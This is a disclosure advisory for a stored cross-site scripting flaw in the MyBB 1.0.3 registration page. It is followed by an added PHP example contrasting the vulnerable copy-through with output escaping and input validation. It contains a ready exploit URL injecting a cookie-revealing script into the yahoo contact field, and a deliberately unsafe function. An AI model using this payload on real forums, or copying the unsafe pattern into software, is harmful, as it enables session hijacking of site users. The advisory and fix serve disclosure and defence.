MyBB 1.0.3 member.php~XSS Attack in contact details
-------
[KAPDA::#36] - MyBB 1.0.3~member.php~XSS Attack in contact details

KAPDA New advisory
MyBB 1.0.3~member.php~XSS Attack in contact details

-------------------Summary----------------
Software: MyBB
Software's Web Site: http://www.mybboard.com
Versions: 1.0.3
Class: Remote
Status: Unpatched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level: medium

-----------------Description---------------
There is a security bug in MyBB 1.0.3 (the latest version, fully patched) that allows an attacker to perform an XSS attack. The bug results from leftover code that is not needed, or code that has no form field for input but still accepts input submitted blindly.

The bug is in member.php during registration. Some fields are never passed through htmlspecialchars when the profile is displayed, because they are only htmlspecialchar'ed when the profile is CHANGED, not when it is registered. Values submitted for these user detail fields at registration are stored as-is and can therefore contain the characters <, > and &.

Exploitable fields are: aim ~ yahoo ~ msn ~ website

The buggy code is in member.php {382-417}:
$newuser = array(
....view source for more details...

--------------Exploit----------------------
/mybb/member.php?username=blab&password=blabblab&password2=blabblab&email=blab@blab.com&email2=blab@blab.com&imagestring=[fill here if needed]&imagehash=[fill here if needed]&action=do_register&yahoo=%3Cscript%3Ealert(document.cookie)%3C/script%3E&regsubmit=register me

mybb:D

--------------Solution---------------------
Not Available

Credit :
--------------------
Discovered by imei addmimistrator
imei(4}kapda(O}ir
addmimistrator(4}gmail(O}com
www.myimei.com
Computer Security Science Researchers Institute [http://www.KAPDA.ir]
-------
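The root cause in the Description is a display path that trusts whatever the registration path stored. The PHP below is an added example written for this page, not MyBB's own code; every function and field name in it is hypothetical. It contrasts the unsafe copy-through of request values with two defender-side controls: validating the contact fields before they are stored, and escaping them with htmlspecialchars at display time so the fix does not depend on which code path (registration or profile change) wrote the value.

```php
<?php
// Added example, not MyBB code. Function and field names are hypothetical.
// Models the flaw: contact fields taken at registration are stored raw and
// later echoed on the profile page without htmlspecialchars().

// Vulnerable pattern: raw request values copied straight into the user record.
function build_newuser_unsafe(array $post): array {
    return [
        'aim'     => $post['aim']     ?? '',
        'yahoo'   => $post['yahoo']   ?? '',
        'msn'     => $post['msn']     ?? '',
        'website' => $post['website'] ?? '',
    ];
}

// Fix 1: escape every contact field at output time, whatever stored it.
function render_contact_field(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Fix 2 (defence in depth): reject values that cannot be a valid handle/URL.
function clean_contact_field(string $name, string $value): string {
    $value = trim($value);
    if ($name === 'website') {
        // Require a well-formed URL with an http(s) scheme; drops javascript: and similar.
        $ok = filter_var($value, FILTER_VALIDATE_URL) !== false
            && in_array(parse_url($value, PHP_URL_SCHEME), ['http', 'https'], true);
        return $ok ? $value : '';
    }
    // IM handles: letters, digits and a few safe punctuation characters only.
    return preg_match('/^[A-Za-z0-9._@-]{1,64}$/', $value) === 1 ? $value : '';
}

function build_newuser_safe(array $post): array {
    $user = [];
    foreach (['aim', 'yahoo', 'msn', 'website'] as $field) {
        $user[$field] = clean_contact_field($field, $post[$field] ?? '');
    }
    return $user;
}

// Constructed registration request: markup in the yahoo field, bad scheme in website.
$post = ['yahoo' => '<script>alert(1)</script>', 'website' => 'javascript:alert(1)'];

$unsafe = build_newuser_unsafe($post);
$safe   = build_newuser_safe($post);
echo "validated yahoo='" . $safe['yahoo'] . "' website='" . $safe['website'] . "'\n";
echo "escaped output: " . render_contact_field($unsafe['yahoo']) . "\n";
```

Running it shows both constructed values rejected by validation, and the stored raw value rendered as `&lt;script&gt;...` rather than live markup when escaped at output.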